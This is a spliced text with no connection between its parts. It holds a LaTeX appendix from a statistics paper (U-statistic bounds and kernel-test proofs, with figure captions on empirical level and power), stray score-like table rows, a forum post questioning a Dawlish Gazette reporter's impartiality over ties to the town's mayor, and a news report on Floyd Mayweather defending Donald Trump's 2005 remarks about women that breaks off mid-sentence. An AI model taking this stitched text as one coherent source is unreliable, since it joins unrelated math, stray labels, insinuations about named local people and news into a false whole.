\mathbb{E}^{1/2}\left[G_{n,i}^{4}\mid\mathcal{F}_{n,i-1}\right]\mathbb{E}^{1/2} \left[I\left(\left|G_{n,i}\right|>\varepsilon\right)\mid\mathcal{F}_{n,i-1}\right] \\ & \leq & \frac{\mathbb{E}\left[G_{n,i}^{4}\mid\mathcal{F}_{n,i-1}\right]}{\varepsilon^{2}} \, .\end{aligned}$$ Then $$\begin{aligned} \sum_{i=2}^{n}\mathbb{E}\left[G_{n,i}^{2}I\left(\left|G_{n,i}\right|>\varepsilon\right)\mid\mathcal{F}_{n,i-1}\right] &\leq & \dfrac{1}{\varepsilon^{2}}\sum_{i=2}^{n}\mathbb{E}\left[G_{n,i}^{4}\mid\mathcal{F}_{n,i-1}\right]\\ &\leq & \dfrac{1}{\varepsilon^{2}}\dfrac{16h^{2p}}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\mathbb{E}\left[u_{i}^{4}f_{i}^{4}\mid W_{i},\, X_{i}\right]\left(\sum_{j=1}^{i-1}u_{j}K_{nij}\psi_{ij}\right)^{4}\\ &\leq & \dfrac{1}{\varepsilon^{2}}\dfrac{16\kappa_{4}h^{2p}}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\left(\sum_{j=1}^{i-1}u_{j}K_{nij}\psi_{ij}\right)^{4},\end{aligned}$$ where $\kappa_{4}$ is any constant that bounds $\mathbb{E}\left[u^{4}f^{4}\mid W,\, X\right].$ The last expression that multiplies $\varepsilon^{-2}$ is positive and has expectation $$\begin{aligned} & \!\!\!\!\! \dfrac{16\kappa_{4}h^{2p}}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j_{1}=1}^{i-1}\sum_{j_{2}=1}^{i-1}\sum_{j_{3}=1}^{i-1}\sum_{j_{4}=1}^{i-1}\mathbb{E}\left[u_{j_{1}}f_{j_{1}}u_{j_{2}}f_{j_{2}}u_{j_{3}}j_{j_{3}}u_{j_{4}}f_{j_{4}}\vphantom{K_{nij_{1}}K_{nij_{2}}K_{nij_{3}}K_{nij_{4}}\psi_{ij_{1}}\psi_{ij_{2}}\psi_{ij_{3}}\psi_{ij_{4}}}\right.\\ & \hphantom{\dfrac{16\kappa_{4}h^{2p}}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j_{1}=1}^{i-1}\sum_{j_{2}=1}^{i-1}\sum_{j_{3}=1}^{i-1}\sum_{j_{4}=1}^{i-1}\mathbb{E}\left[\right.}\left.\times\vphantom{u_{j_{1}}f_{j_{1}}u_{j_{2}}f_{j_{2}}u_{j_{3}}j_{j_{3}}u_{j_{4}}f_{j_{4}}}K_{nij_{1}}K_{nij_{2}}K_{nij_{3}}K_{nij_{4}}\psi_{ij_{1}}\psi_{ij_{2}}\psi_{ij_{3}}\psi_{ij_{4}}\right]\\ = & \;\;\dfrac{96\kappa_{4}h^{2p}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{j=1}^{i-1}\sum_{k=1}^{j-1}\mathbb{E}\left[u_{j}^{2}f_{j}^{2}u_{k}^{2}f_{k}^{2}K_{nij}^{2}K_{nik}^{2}\psi_{ij}^{2}\psi_{ik}^{2}\right]\\ & +\dfrac{16\kappa_{4}h^{2p}}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\mathbb{E}\left[u_{j}^{4}f_{j}^{4}K_{nij}^{4}\psi_{ij}^{4}\right]\\ = & \;\;O\left(n^{-1}\right)\mathbb{E}\left[u_{j}^{2}f_{j}^{2}u_{k}^{2}f_{k}^{2}\mathbf{K}_{nij}\mathbf{K}_{nik}\right]+O\left(n^{-2}h^{-p}\right)\mathbb{E}\left[u_{j}^{4}f_{j}^{4}\mathbf{K}_{nij}\right]\\ = & \;\;O\left(n^{-1}\right)+O\left(n^{-2}h^{-p}\right).\end{aligned}$$ The desired result follows. The following result, known as Bochner’s Lemma (see Theorem 1.1.1. of [@Bochner1955]) will be repeatedly use in the following. We recall it for the sake of completeness. \[Bochner\]For any function $l\left(\cdot\right)\in{\cal U}^{p}$ and any integrable kernel $K\left(\cdot\right)$, $$\sup_{x\in\mathbb{R}^{p}}\left|\int l\left(y\right)\frac{1}{h^{p}}K\left(\frac{x-y}{h}\right)\, dy-l\left(x\right)\int K\left(u\right)\, du\right|\rightarrow0.$$ In the following we provide the proofs for rates for the remaining terms in the decomposition of $I_n$, see Propositions \[Ustat\] and \[Remaining\]. For this purpose, we use the following a decomposition for $U-$statistics that can be found in [@Lavergne2000]: if $U_{n}=\left(1/n^{\left(m\right)}\right)\sum_{a}H_{n}\left(Z_{i_{1}},\,\dots,\, Z_{i_{m}}\right)$, then $$\mathbb{E}\left[U_{n}^{2}\right] = \left(\dfrac{1}{n^{\left(m\right)}}\right)^{2}\sum_{c=0}^{m}\dfrac{n^{\left(2m-c\right)}}{c!}\sum_{\left|\Delta_{1}\right|=c=\left|\Delta_{2}\right|}^{\left(c\right)}I\left(\Delta_{1},\Delta_{2}\right)= \sum_{c=0}^{m}O\left(n^{-c}\right)\sum_{\left|\Delta_{1}\right|=c=\left|\Delta_{2}\right|}^{\left(c\right)}I\left(\Delta_{1},\Delta_{2}\right),$$ where $\sum^{\left(c\right)}$ denotes summation over sets $\Delta_{1}$ and $\Delta_{1}$ of ordered positions of length $c$, $$I\left(\Delta_{1},\Delta_{2}\right)=\mathbb{E}\left[H_{n}\left(Z_{i_{1}},\,\dots,\, Z_{i_{m}}\right)H_{n}\left(Z_{j_{1}},\,\dots,\, Z_{j_{m}}\right)\right]$$ and the $i$’s position in $\Delta_{1}$ coincide with the $j$’s position in $\Delta_{2}$ and are pairwise distinct otherwise. Now, we will bound $\mathbb{E}\left[U_{n}^{2}\right]$ using the $\xi_{c}=\sum^{\left(c\right)}I\left(\Delta_{1},\Delta_{2}\right)$ and the fact that by Cauchy’s inequality, $$\begin{aligned} I^{2}\left(\Delta_{1},\Delta_{2}\right) & = & \mathbb{E}^{2}\left[\mathbb{E}\left[H_{n}\left(Z_{i_{1}},\,\dots,\, Z_{i_{m}}\right)\mid Z_{c}\right]\mathbb{E}\left[H_{n}\left(Z_{j_{1}},\,\dots,\, Z_{j_{m}}\right)\mid Z_{c}\right]\right]\\ & \leq & \mathbb{E}\left[\mathbb{E}^{2}\left[H_{n}\left(Z_{i_{1}},\,\dots,\, Z_{i_{m}}\right)\mid Z_{c}\right]\right]\mathbb{E}\left[\mathbb{E}^{2}\left[H_{n}\left(Z_{j_{1}},\,\dots,\, Z_{j_{m}}\right)\mid Z_{c}\right]\right]\end{aligned}$$ where $Z_{c}$ denotes the common $Z_{i}$’s. After bounding the $\psi_{ij}$’s by $\left\Vert \psi\right\Vert _{\infty}$ the arguments are very similar to those used in [@Lavergne2000]. We prove only the first statement. [(i)]{} : $I_{1,3}$ is a U-statistic with kernel $H_{n}\left(Z_{i},Z_{j},Z_{l}\right)=u_{i}f_{i}u_{l}L_{njl}K_{nij}\psi_{ij}.$ We need to bound the $\xi_{c}$, $c=0,1,2,3$. 1. $\mathbb{E}\left[H_{n}\right]=0,$ thus $\xi_{0}=0$. 2. $\xi_{1}=O\left(\delta_{n}^{2}\right)$. Indeed, $\mathbb{E}\left[H_{n}\mid Z_{l}\right]=\delta_{n}u_{l}\mathbb{E}\left[d_{i}f_{i}L_{njl}K_{nij}\psi_{ij}\mid Z_{l}\right]$ and $\mathbb{E}\left[H_{n}\mid Z_{i}\right]=0=\mathbb{E}\left[H_{n}\mid Z_{j}\right].$ Then $$\begin{aligned} \mathbb{E}\left[\mathbb{E}^{2}\left[H_{n}\mid Z_{l}\right]\right] & \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{2}\mathbb{E}\left[u_{l}^{2}\mathbb{E}^{2}\left[d_{i}f_{i}L_{njl}K_{nij}\mid Z_{l}\right]\right]\\ & = & O\left(\delta_{n}^{2}\right)\mathbb{E}\left[u_{l}^{2}\mathbb{E}^{2}\left[L_{njl}d_{j}f_{j}^{2}\mid Z_{l}\right]\right]=O\left(\delta_{n}^{2}\right).\end{aligned}$$ 3. $\xi_{2}=O\left(g^{-p}\right)$. Indeed, we have $$\begin{aligned} \mathbb{E}\left[H_{n}\mid Z_{i},Z_{j}\right] & = & u_{i}f_{i}K_{nij}\psi_{ij}\mathbb{E}\left[u_{l}L_{njl}\mid Z_{j}\right]=0,\\ \mathbb{E}\left[H_{n}\mid Z_{i},Z_{l}\right] & = & u_{i}f_{i}u_{l}\mathbb{E}\left[L_{njl}K_{nij}\psi_{ij}\mid Z_{i},Z_{l}\right],\\ \mathbb{E}\left[H_{n}\mid Z_{j},Z_{l}\right] & = & u_{l}L_{njl}\mathbb{E}\left[u_{i}f_{i}K_{nij}\psi_{ij}\mid Z_{j}\right]=\delta_{n}u_{l}L_{njl}\mathbb{E}\left[d_{i}f_{i}K_{nij}\psi_{ij}\mid Z_{j}\right].\end{aligned}$$ By successive applications of Lemma \[Bochner\], $$\begin{aligned} \mathbb{E}\left[\mathbb{E}^{2}\left(H_{n}\mid Z_{i},Z_{l}\right)\right] & \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\mathbb{E}\left[u_{i}^{2}f_{i}^{2}u_{l}^{2}\mathbb{E}\left[L_{njl}K_{nij}\mid Z_{i},Z_{l}\right]\mathbb{E}\left[L_{nj^{\prime}l}K_{nij^{\prime}}\mid Z_{i},Z_{l}\right]\right]\\ & = & O\left(g^{-p}\right)\mathbb{E}\left[u_{i}^{2}f_{i}^{2}u_{l}^{2}\mathbb{E}\left[\mathbf{L}_{njl}\mathbf{K}_{nij}\mid Z_{i},Z_{l}\right]\mathbb{E}\left[\mathbf{K}_{nij^{\prime}}\mid Z_{i},Z_{l}\right]\right]\\ & = & O\left(g^{-p}\right)\mathbb{E}\left[u_{i}^{2}f_{i}^{3}u_{l}^{2}\mathbf{L}_{njl}\mathbf{K}_{nij}\right]=O\left(g^{-p}\right),\\ \mathbb{E}\left[\mathbb{E}^{2}\left[H_{n}\mid Z_{j},Z_{l}\right]\right] & \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{2}\mathbb{E}\left[u_{l}^{2}L_{njl}^{2}\mathbb{E}^{2}\left[d_{i}f_{i}K_{nij}\mid Z_{j}\right]\right]\\ & \leq & O\left(\delta_{n}^{2}\right)\mathbb{E}\left[u_{l}^{2}L_{njl}^{2}d_{j}^{2}f_{j}^{4}\right]\\ & = & O\left(\delta_{n}^{2}\right) O\left(g^{-p}\right)\mathbb{E}\left[u_{l}^{2}\mathbf{L}_{njl}d_{j}^{2}f_{j}^{4}\right] =O\left(g^{-p}\right).\end{aligned}$$ 4. $\xi_{3}=O\left(g^{-p}h^{-p}\right)$, as $\mathbb{E}\left[H_{n}^{2}\right]$ equals $$\mathbb{E}\left[u_{i}^{2}u_{l}^{2}f_{i}^{2}L_{njl}^{2}K_{nij}^{2}\psi_{ij}^{2}\right]=O\left(g^{-p}h^{-p}\right)\mathbb{E}\left[u_{i}^{2}u_{l}^{2}f_{i}^{2}\mathbf{L}_{njl}\mathbf{K}_{nij}\right]=O\left(g^{-p}h^{-p}\right).$$ Collecting results, $\mathbb{E}\left[\left(nh^{p/2}I_{1,3}\right)^{2}\right]= O\left(\delta_{n}^{2}nh^{p}\right)+ O\left(h^{p}/g^{p}\right)+ O\left(n^{-1}g^{-p}\right)=o(1)$. As in Proposition \[Ustat\], we only prove the first statement. We will use the following lemma, which is similar to Lemma 2 of [@Lavergne2000], and whose proof is then omitted. \[Lambda\] Let $\Delta f_{i}^{j}= \widehat{f}_{i}^{j}-f_{i}.$ If $f\left(\cdot\right)\in{\cal U}^{p}$ and $ng^{p}\rightarrow\infty$, $\mathbb{E}\left[\Delta^{2}f_{i}^{j}\mid Z_{i},Z_{j},Z_{i'},Z_{j'}\right]=o\left(1\right)$ and $E\left[\Delta^{2}f_{i}^{j,l}\mid Z_{i},Z_{j},Z_{l},Z_{i'},Z_{j'},Z_{l'}\right]=o\left(1\right)$ uniformly in the indices. [(i)]{} : Let us denote $\Delta f_{i}^{j}= \widehat{f}_{i}^{j}-f_{i}.$ We have $I_{1,1}=\left(1/n^{\left(2\right)}\right)\sum_{a}u_{i}\Delta f_{i}^{j}u_{j}f_{j}K_{nij}\psi_{ij}$ so that $$\label{biz_biz} \mathbb{E}\left[I_{1,1}^{2}\right]=\left(\frac{1}{n^{\left(2\right)}}\right)^{2}\left[\sum_{a}u_{i}\Delta f_{i}^{j}u_{j}f_{j}K_{nij}\psi_{ij}\right]\left[\sum_{a}u_{i^{\prime}}\Delta f_{i^{\prime}}^{j^{\prime}}u_{j^{\prime}}f_{j^{\prime}}K_{ni^{\prime}j^{\prime}}\psi_{i^{\prime}j^{\prime}}\right],$$ where the first (respectively the second) sum is taken over all arrangements of different indices $i$ and $j$ (respectively different indices $i^{\prime}$ and $j^{\prime}$). Let $\overline{W}$ denote the sample of $W_{i},$ $1\leq i \leq n,$ and let $\lambda_{n}=E\left[\Delta^{2}f_{i}^{j}\mid Z_{i},Z_{j},Z_{i^{\prime}},Z_{j^{\prime}}\right]$. By Lemma \[Lambda\], $\lambda_n=o\left(1\right)$ uniformly in the indices. By Equation (\[biz\_biz\]), $\mathbb{E}\left[I_{1,1}^{2}\right]$ is equal to a normalized sum over four indices. This sum could split in three sums of the following types. 1. All indices are different, that is a sum of $n^{\left(4\right)}$ terms. Each term in the sum can be bounded as follows: $$\begin{array}{cl} & \mathbb{E}\left[u_{i}\Delta f_{i}^{j}u_{j}f_{j}K_{nij}\psi_{ij}u_{i^{\prime}}\Delta f_{i^{\prime}}^{j^{\prime}}u_{j^{\prime}}f_{j^{\prime}}K_{ni^{\prime}j^{\prime}}\psi_{i^{\prime}j^{\prime}}\right]\\ \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{4}\mathbb{E}\left[\Delta f_{i}^{j}f_{j}\Delta f_{i^{\prime}}^{j^{\prime}}f_{j^{\prime}}\mathbb{E}\left[d_{i}d_{j}d_{i'}d_{j^{\prime}}K_{nij}K_{ni^{\prime}j^{\prime}}\mid\overline{W}\right]\right]\\ \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{4}\mathbb{E}\left[f_{j}f_{j^{\prime}}d_{i}d_{j}d_{i^{\prime}}d_{j^{\prime}}K_{nij}K_{ni^{\prime}j^{\prime}}\mathbb{E}\left[\Delta f_{i}^{j}\Delta f_{i^{\prime}}^{j^{\prime}}\mid Z_{i},Z_{j},Z_{i^{\prime}},Z_{j^{\prime}}\right]\right]\\ \leq & O(\delta_{n}^{4}\lambda_{n})\mathbb{E}\left|f_{j}f_{j^{\prime}}d_{i}d_{j}d_{i^{\prime}}d_{j^{\prime}}K_{nij}K_{ni^{\prime}j^{\prime}}\right|=O\left(\delta_{n}^{4}\lambda_{n}\right). \end{array}$$ 2. One index is common to $\left\{ i,j\right\} $ and $\left\{ i^{\prime},j^{\prime}\right\} ,$ that is a sum of $4n^{\left(3\right)}$ terms. For each of such terms we can write $$\begin{array}{ccl} \left(i^{\prime}=i\right)\quad & & \mathbb{E}\left[u_{i}^{2}\Delta f_{i}^{j}u_{j}f_{j}K_{nij}\psi_{ij}\Delta f_{i}^{j^{\prime}}u_{j^{\prime}}f_{j^{\prime}}K_{nij^{\prime}}\psi_{ij^{\prime}}\right]\\ & \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{2}\mathbb{E}\left[\Delta f_{i}^{j}f_{j}\Delta f_{i}^{j^{\prime}}f_{j^{\prime}}E\left[u_{i}^{2}d_{j}d_{j^{\prime}}K_{nij}K_{nij^{\prime}}\mid\overline{W}\right]\right]\\ & \leq & O(\delta_{n}^{2}\lambda_{n})\mathbb{E}\left|f_{j}f_{j^{\prime}}u_{i}^{2}d_{j}d_{j^{\prime}}K_{nij}K_{nij^{\prime}}\right|=O\left(\delta_{n}^{2}\lambda_{n}\right),\\ \\ \left(j^{\prime}=j\right)\quad & & \mathbb{E}\left[u_{i}\Delta f_{i}^{j}u_{j}^{2}f_{j}^{2}K_{nij}\psi_{ij}u_{i^{\prime}}\Delta f_{i^{\prime}}^{j}K_{ni^{\prime}j}\psi_{i^{\prime}j}\right]\\ & \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{2}\mathbb{E}\left[\Delta f_{i}^{j}f_{j}^{2}\Delta f_{i^{\prime}}^{j}\mathbb{E}\left[d_{i}u_{j}^{2}d_{i^{\prime}}K_{nij}K_{ni^{\prime}j}\mid\overline{W}\right]\right]\\ & \leq & O(\delta_{n}^{2}\lambda_{n})\mathbb{E}\left|f_{j}^{2}d_{i}u_{j}^{2}d_{i'}K_{nij}K_{ni^{\prime}j}\right|=O\left(\delta_{n}^{2}\lambda_{n}\right),\\ \\ \left(i^{\prime}=j\right)\quad & & \mathbb{E}\left[u_{i}\Delta f_{i}^{j}u_{j}^{2}f_{j}K_{nij}\psi_{ij}\Delta f_{j}^{j^{\prime}}u_{j^{\prime}}f_{j^{\prime}}K_{njj^{\prime}}\psi_{jj^{\prime}}\right]\\ & \leq & \left\Vert \psi\right\Vert _{\infty}^{2}\delta_{n}^{2}\mathbb{E}\left[\Delta f_{i}^{j}f_{j}\Delta f_{j}^{j^{\prime}}f_{j^{\prime}}E\left[d_{i}u_{j}^{2}d_{j'}K_{nij}K_{njj^{\prime}}\mid\overline{W}\right]\right]\\ & \leq & O(\delta_{n}^{2}\lambda_{n})\mathbb{E}\left|f_{j}f_{j^{\prime}}d_{i}u_{j}^{2}d_{j^{\prime}}K_{nij}K_{njj^{\prime}}\right|=O\left(\delta_{n}^{2}\lambda_{n}\right). \end{array}$$ The case $j^{\prime}=i$ is similar to $i^{\prime}=j$. 3. Two indices in common to $\left\{ i,j\right\} $ and $\left\{ i^{\prime},j^{\prime}\right\}, $ that is a sum of $2n^{\left(2\right)}$ terms. For each term in the sum we can write $$\mathbb{E}\left[u_{i}^{2}u_{j}^{2}\left(\Delta f_{i}^{j}\right)^{2}\!f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}\right]\!=O\!\left(\lambda_{n}h^{-p}\right)\;\mbox{ and }\;\mathbb{E}\left[u_{i}^{2}u_{j}^{2}\Delta f_{i}^{j}\Delta f_{j}^{i}f_{i}f_{j}K_{nij}^{2}\psi_{ij}^{2}\right]\!=O\!\left(\lambda_{n}h^{-p}\right).$$ Therefore, $ \mathbb{E}\left[\left(nh^{p/2}I_{1,1}\right)^{2}\right]=\delta_{n}^{4}n^{2}h^{p}O\left(\lambda_{n}\right)+\delta_{n}^{2}nh^{p}O\left(\lambda_{n}\right)+O\left(\lambda_{n}\right) =O\left(\lambda_{n}\right) $. The result then follows from Lemma \[Lambda\]. We only prove the result for $\Delta \hat r_i \hat f_i, $ as the reasoning is similar for $\Delta\hat f_i$. We have $$\begin{aligned} \Delta \hat r_i \hat f_i &=& \frac{1}{(n-1)g^p} \sum_{k\neq i} \left\{Y_k L\left( (W_i-W_k)g^{-1} \right) -\mathbb{E}\left[Y L\left( (W_i - W) g^{-1} \right)\right]\right\}\\ && + \mathbb{E}\left[r(W) g^{-p} L\left( (W_i-W) g^{-1} \right)\right] - r(W_i) f(W_i)\\ &=& \Delta_{1i} + \Delta_{2i}.\end{aligned}$$ The uniform continuity of $r(\cdot)f(\cdot)$ implies $\sup_i|\Delta_{2i}|=o_p(1)$ by Lemma \[Bochner\]. [For $\sup_i|\Delta_{1i}|$, we use empirical process tools. Let us introduce some notation. Let $\mathcal{G}$ be a class of functions of the observations with envelope function $G$ and let $$J(\delta,\mathcal{G}, L^2 )=\sup_Q \int_0^\delta \sqrt{1+\ln N (\varepsilon \|G\|_{2},\mathcal{G}, L^2(Q) ) } d\varepsilon ,\qquad 0<\delta\leq 1,$$ denote the uniform entropy integral, where the supremum is taken over all finitely discrete probability distributions $Q$ on the space of the observations, and $\| G \|_{2}$ denotes the norm of $G$ in $L^2(Q)$. Let $Z_1,\cdots,Z_n$ be a sample of independent observations and let $$\mathbb{G}_n g=\frac{1}{\sqrt{n}}\sum_{i=1}^n \gamma(Z_i) , \qquad \gamma \in\mathcal{G}$$ be the empirical process indexed by $\mathcal{G}$. If the covering number $N (\varepsilon ,\mathcal{G}, L^2(Q) ) $ is of polynomial order in $1/\varepsilon,$ there exists a constant $c>0$ such that $J(\delta,\mathcal{G}, L^2 )\leq c \delta \sqrt{\ln(1/\delta)}$ for $0<\delta<1/2.$ Now if $\mathbb{E}\gamma^2 < \delta^2 \mathbb{E}G^2$ for every $\gamma$ and some $0<\delta <1$, and $\mathbb{E}G^{(4\upsilon-2)/(\upsilon-1)}<\infty$ for some $\upsilon>1$, under mild additional measurability conditions, Theorem 3.1 of [@Vaart2011] implies $$\label{vwww0} \sup_{\mathcal{G}}|\mathbb{G}_n \gamma| = J(\delta,\mathcal{G}, L^2 )\left( 1 + \frac{ J(\delta^{1/\upsilon},\mathcal{G}, L^2 )}{\delta^2 \sqrt{n} } \frac{\|G\|_{(4\upsilon-2)/(\upsilon-1)}^{2-1/\upsilon}}{\|G\|_{2}^{2-1/\upsilon}} \right)^{\upsilon/(2\upsilon-1)} \|G\|_2 O_p(1),$$ where $\|G\|_{2}^2 = \mathbb{E}G^2$ and the $ O_p(1)$ term is independent of $n.$ Note that the family $\mathcal{G}$ could change with $n$, as soon as the envelope is the same for all $n$. [We apply this result to the family of functions $\mathcal{G} = \{ Y L ((W - w)/g) : w\in\mathbb{R}^p\}$ for a sequence $g$ that converges to zero and the envelope $G(Y,W)=Y\sup_{w\in\mathbb{R}^p} L(w).$ Its entropy number is of polynomial order in $1/\varepsilon$, independently of $n$, as $L(\cdot)$ is of bounded variation, see for instance [@Vaart1996]. Now for any $\gamma \in \mathcal{G}$, $ \mathbb{E} \gamma ^2(Y,W) \leq C g^p \mathbb{E} G^2(Y,W), $ for some constant $C$. Let $\delta = g^{3p/7},$ so that $ \mathbb{E} \gamma ^2(Y,W) \leq C^\prime \delta^2 \mathbb{E} G^2(Y,W), $ for some constant $C ^\prime$ and $\upsilon =3/2$, which corresponds to $\mathbb{E}G^{8}<\infty$ that is guaranteed by our assumptions. The bound in (\[vwww0\]) thus yields $$\sup_{\mathcal{G}}\left|\frac{1}{g^p \sqrt{n}} \; \mathbb{G}_n \gamma\right| = \frac{ \ln^{1/2}(n)}{g^{4p/7} \sqrt{n}} \left[ 1 + n^{-1/2}g ^{-4p/7}\ln^{1/2}(n) \right]^{3/4} O_p(1) ,$$ where the $ O_p(1)$ term is independent of $n$. Since $n^{7/8} g^p/\ln n \rightarrow \infty,$ the expected result follows. ]{} ]{} We have $$\begin{aligned} \hat{u}_{i}^{*}\hat{f}_{i} & = & \dfrac{1}{n-1}\sum_{k\neq i}\left(Y_{i}^{*}-Y_{k}^{*}\right)L_{nik}\\ & = & u_{i}^{*}\hat{f}_{i}-\dfrac{1}{n-1}\sum_{k\neq i}u_{k}^{*}L_{nik}+\dfrac{1}{n-1}\sum_{k\neq i}\left(\hat{r}_{i}-\hat{r}_{k}\right)L_{nik}\end{aligned}$$ where $$\begin{aligned} \dfrac{1}{n-1}\sum_{k\neq i}\left(\hat{r}_{i}-\hat{r}_{k}\right)L_{nik} & = & \dfrac{1}{n-1}\sum_{k\neq i}\left(r_{i}-r_{k}\right)L_{nik} +\left(\hat{r}_{i}-r_{i}\right)\hat{f}_{i}\\ & & -\dfrac{1}{\left(n-1\right)^{2}\hat{f}_{k}}\sum_{k\neq i}\sum_{k^{\prime}\neq k}\left(r_{k^{\prime}}-r_{k}\right)L_{nkk^{\prime}}L_{nik}\\ & & -\dfrac{1}{\left(n-1\right)^{2}\hat{f}_{k}}\sum_{k\neq i}\sum_{k^{\prime}\neq k}u_{k^{\prime}}L_{nkk^{\prime}}L_{nik}. $$ By Lemma \[unif\_omeg\] and the fact that $f(\cdot)$ is bounded away from zero, deduce that $\sup_i |\hat{r}_{i}-r_{i}| = o_{p}\left(1\right).$ From this and applying several times the arguments in the proof of Lemma \[unif\_omeg\] we obtain $$\dfrac{1}{n-1}\sum_{k\neq i}\left(\hat{r}_{i}-\hat{r}_{k}\right)L_{nik} = o_{p}\left(1\right).$$ On the other hand, $$\begin{aligned} \left|\dfrac{1}{n-1}\sum_{k\neq i}u_{k}^{*}L_{nik}\right| & \leq &\left|\dfrac{1}{n-1}\sum_{k\neq i}\eta_{k} u_k L_{nik}\right| +\dfrac{\sup_j |\hat{r}_{j}-r_{j}|}{n-1}\sum_{k\neq i}|\eta_k| \bf{L}_{nik}\\ &=& o_{p}\left(1\right),\end{aligned}$$ where we used again the arguments for $\Delta_{1i}$ in the proof of Lemma \[unif\_omeg\] (here with $\eta_{k} u_k$ and $|\eta_k|$ in the place of $Y_k$) to derive the last rate. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ![Empirical rejections under $H_0$ as a function of the bandwidth, $n=100$ \[fig:LevelCont\]](grapheContLevelq3quad.eps "fig:") ![Empirical rejections under $H_0$ as a function of the bandwidth, $n=100$ \[fig:LevelCont\]](grapheContLevelq5quad.eps "fig:") ![Empirical rejections under $H_0$ as a function of the bandwidth, $n=100$ \[fig:LevelCont\]](grapheContLevelq7quad.eps "fig:") ![Empirical rejections under $H_0$ as a function of the bandwidth, $n=100$ \[fig:LevelCont\]](grapheContLevelLegend.eps "fig:") ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ![Empirical power curves for a quadratic alternative, $n=100$ \[fig:PowerContQs\]](grapheContPowerq3quad.eps "fig:") ![Empirical power curves for a quadratic alternative, $n=100$ \[fig:PowerContQs\]](grapheContPowerq5quad.eps "fig:") ![Empirical power curves for a quadratic alternative, $n=100$ \[fig:PowerContQs\]](grapheContPowerq7quad.eps "fig:") ![Empirical power curves for a quadratic alternative, $n=100$ \[fig:PowerContQs\]](grapheContPowerLegend.eps "fig:") --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ![Empirical power curves for a quadratic alternative, $q=5$ \[fig:PowerContNs\]](grapheContPowern50quad.eps "fig:") ![Empirical power curves for a quadratic alternative, $q=5$ \[fig:PowerContNs\]](grapheContPowern200quad.eps "fig:") ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ![Empirical power curves for linear and sine alternative, $n=100$ and $q=5$[]{data-label="fig:PowerContAlter"}](grapheContPowerAlterLinear.eps "fig:") ![Empirical power curves for linear and sine alternative, $n=100$ and $q=5$[]{data-label="fig:PowerContAlter"}](grapheContPowerAlterSinus.eps "fig:") ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ![Empirical rejection under $H_{0}$ as a function of the bandwidth, $X$ Bernoulli and $n=100$ \[fig:LevelDisc\]](grapheDiscLevel "fig:") ![Empirical rejection under $H_{0}$ as a function of the bandwidth, $X$ Bernoulli and $n=100$ \[fig:LevelDisc\]](grapheDiscLevelLegend "fig:") ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ![Empirical power curves, $X$ Bernoulli and $n=100$ \[fig:PowerDisc\]](grapheDiscPowerQuadratic "fig:") ![Empirical power curves, $X$ Bernoulli and $n=100$ \[fig:PowerDisc\]](grapheDiscPowerSinus "fig:") ![Empirical power curves, $X$ Bernoulli and $n=100$ \[fig:PowerDisc\]](grapheDiscPowerLegend "fig:") -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | Mid | [
0.636165577342047,
36.5,
20.875
] |
General Discussion People Dawlish Gazette The front page of this weeks Dawlish Post hails the arrival of Tom Scobie, as the new Town and Villages Reporter of the Dawlish Gazette. At first, this appointment appears innocuous, but closer inspection raises the concerns that council/mayoral reportage may not be impartial. Mr Scobie sat alongside councillor Protheroe on the local council, both of them Lib Dem. Mr Protheroe is now mayor of Dawlish Town council. A close friend of Mr Scobie is in the employment of Mr Protheroe. These points raise concerns of a conflict of interest. How impartial will Mr Scobie's reporting be with the above vested interests? We have witnessed before the reluctance of local reporters to seriously investigate council matters; even resulting in one journalist to leave their post due to residents complaints. Are we therefore to deduce that the appointment of Tom Scobie will result in a 'closed shop' when it comes to open, honest, journalism regarding Dawlish Town Council? Mr Scobie's manifesto includes his "intention to ensure that, with the active engagement of our readers, the Gazette not only reflects the community but serves it with renewed vigour" and "looking forward to hearing from people with every shade of opinion and to covering the news stories which are important to them". One can only hope he is a man of his word, though the experience of previous reporting/reporters leaves many of us with severe reservations. | Mid | [
0.573770491803278,
35,
26
] |
Image copyright AlLSPORT/Getty Image caption Mayweather also defended Mr Trump against allegations of racism US boxer Floyd Mayweather has been criticised on social media for defending vulgar comments made by Donald Trump in 2005 about women. "He speaks like a real man spoke," Mayweather, who attended President Trump's inauguration, told the Hollywood Unlocked website. The comments sparked a backlash, with critics pointing to the boxer's convictions for domestic violence. Mr Trump apologised after taped remarks about groping women emerged last year. Using graphic language, Mr Trump is heard bragging about kissing women and grabbing them by the genitals, during a private conversation. Mayweather told Hollywood Unlocked that Mr Trump "didn't do nothing". "Real men speak like: 'Man, she had a fat ass. You see her ass? I had to squeeze her ass?" the boxer said. "So he's talking locker-room talk. Locker-room talk." Many on social media referred to the boxer's history of attacking women. Mayweather has previously expressed support for 